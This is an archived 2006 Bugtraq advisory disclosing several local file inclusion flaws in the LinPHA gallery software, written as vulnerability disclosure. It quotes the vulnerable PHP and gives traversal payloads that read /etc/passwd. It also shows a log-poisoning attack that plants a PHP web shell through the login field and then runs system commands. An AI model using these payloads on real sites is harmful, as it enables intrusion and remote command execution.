lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060211115432.21430.qmail@securityfocus.com>
Date: 11 Feb 2006 11:54:32 -0000
From: rgod@...istici.org
To: bugtraq@...urityfocus.com
Subject: Linpha <= 1.0 multiple arbitrary local inclusion


------------- Linpha <= 1.0 multiple arbitrary local inclusion -----------------

software:
site: http://linpha.sourceforge.net/nuke/
description:  " LinPHA is an easy to use,  multilingual,  flexible photo / image
archive / album / gallery  written in  PHP.  It uses a  SQL  database  to  store
information about your pictures."
--------------------------------------------------------------------------------

i)
vulnerable code in docs/index.php at lines 28 - 41:

...
if(isset($_GET['lang']))	// come from install pages
{
	$include_lang = $_GET['lang'];
}
elseif(file_exists(TOP_DIR.'/sql/db_connect.php'))
{
	include_once(TOP_DIR.'/functions/db_api.php');
	$include_lang = get_language();
}
else
{
	$include_lang = get_http_accept_lang();
}
include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');
...

well, you can include an arbitrary php file from local resources, poc:

http://[target]/[host]/docs/index.php?lang=/../../../../../../../../../../test

and, if magic_quotes_gpc = Off, any file:

http://[target]/[host]/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00

--------------------------------------------------------------------------------
ii) install directory is not removed after installation, you cannot use files to
modify settings but we have arbitrary local inclusion issues in several files:

      --------------------------------------------------------------------------
ii.a) vulnerable code in install/install.php at lines 26-36:

...
if (@$_GET['language']) {
	$lang=$_GET['language'];
} else if (@$_POST['language']) {
	$lang=$_POST['language'];
} else if ($http_accept_lang) {
  $lang = $http_accept_lang;
} else {
	$lang="English";
}

include_once(TOP_DIR.'/lang/lang.'.$lang.'.php');
...

poc:

http://[target]/[path]/install/install.php?language=/../../../../../../../test

if magic_quotes_gpc = Off:

http://[target]/[path]/install/install.php?language=/../../sql/tmp/linpha.log%00

      --------------------------------------------------------------------------
ii.b) vulnerable code in install/sec_stage_install.php at lines 22-31:

...
switch($_GET['whatlang'])
{
case 1:
	include_once(TOP_DIR.'/lang/lang.'.@...ET['language'].'.php');
	break;

	default:
	include_once(TOP_DIR.'/lang/lang.English.php');
	break;
}
...

poc:

http://[target]/[path]/install/sec_stage_install.php?whatlang=1&language=/../../../../../../../test

if magic_quotes_gpc = Off:

http://[target]/[path]/install/sec_stage_install.php?whatlang=1&language=/../../../../../../../etc/passwd%00

      --------------------------------------------------------------------------
ii.c) vulnerable code in install/third_stage_install.php at line 22:

...
include_once(TOP_DIR.'/lang/lang.'.$_GET['language'].'.php');
...

poc:

http://[target]/[path]/install/sec_stage_install.php?language=/../../../../../../../test

if magic_quotes_gpc = Off:

http://[target]/[path]/install/sec_stage_install.php?language=/../../../../../../../etc/passwd%00

      --------------------------------------------------------------------------
ii.d) vulnerable code in install/forth_stage_install.php at line 22:

...
include_once(TOP_DIR.'/lang/lang.'.$_POST['language'].'.php');
...

poc:

POST [path]install/forth_stage_install.php HTTP/1.1\r\n";
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: GameBoy, Powered by Nintendo
Connection: Close

language=/../../../../../../../../test

if magic_quotes_gpc = Off:

POST [path]install/forth_stage_install.php HTTP/1.1\r\n";
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: Sun-Tzu
Connection: Close

language=/../../../../../../../../etc/passwd%00

--------------------------------------------------------------------------------
iii) if "user login events log" is set to "file" in Linpha  administration
(not the default) a remote user can inject arbitrary code in sql/tmp/linpha.log

poc: try to login with username: <?php system($_GET[cmd]);?>
and password: [whatever]

now in sql/tmp/linpha.log we have something like this:

USER | ERROR | 20060211 035519 | 192.168.1.5 | User <?php system($_GET[cmd]);?>: login failed!

now, if magic_quotes_gpc = Off on target system, you can launch operating system
commands, poc:

http://[target]/[path]/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00

(same technique with install dir scripts...)

--------------------------------------------------------------------------------
rgod

site: http://retrogod.altervista.org
mail: rgod at autistici org
original adivsory: http://retrogod.altervista.org/linpha_10_local.html
--------------------------------------------------------------------------------




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ